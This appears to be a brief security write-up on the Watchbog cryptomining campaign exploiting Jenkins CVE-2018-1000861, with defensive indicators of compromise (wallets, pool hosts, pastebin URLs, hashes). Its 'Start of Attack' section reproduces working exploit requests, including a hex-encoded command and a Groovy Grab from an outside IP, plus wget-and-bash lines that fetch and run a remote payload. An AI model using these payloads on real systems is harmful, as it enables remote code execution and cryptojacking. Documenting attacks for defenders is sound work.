Return of Watchbog: Exploiting Jenkins CVE-2018-1000861

Start of Attack

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1
Host: [victim_host]:[jenkins_port]
GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1
Host: [victim_host]:[jenkins_port]
wget https://pastebin.com/raw/B3R5Unwh -O /tmp/baby
bash /tmp/baby

Mining and Persistence

https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz

Security Suggestion

IOC

44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B (previous)
47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 (current)
pool.minexmr.com:80
pool.minexmr.com:443
https://pastebin.com/raw/B3R5Unwh
https://pastebin.com/raw/J6NdVBHq
https://pastebin.com/raw/KGwfArMR
https://pastebin.com/raw/AgdgACUD
https://pastebin.com/raw/vvuYb1GC
https://pastebin.com/raw/aGTSGJJp
https://pastebin.com/raw/05p0fTYd
https://pastebin.com/raw/KxWPFeEn
https://pastebin.com/raw/X6wvuv98
https://pixeldra.in/api/download/nZ2s4L
65cfcad6dc3d31695b8f3ffa08e5d389
95721de55ad89005484b4c21f768d94e
157495f6ba8c36c38984d1f902cf3ac0
314097a1d41697352c961026aa1ed87c
1dbd97c70a89e64cbfb65c78ac39938e
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

Reference:
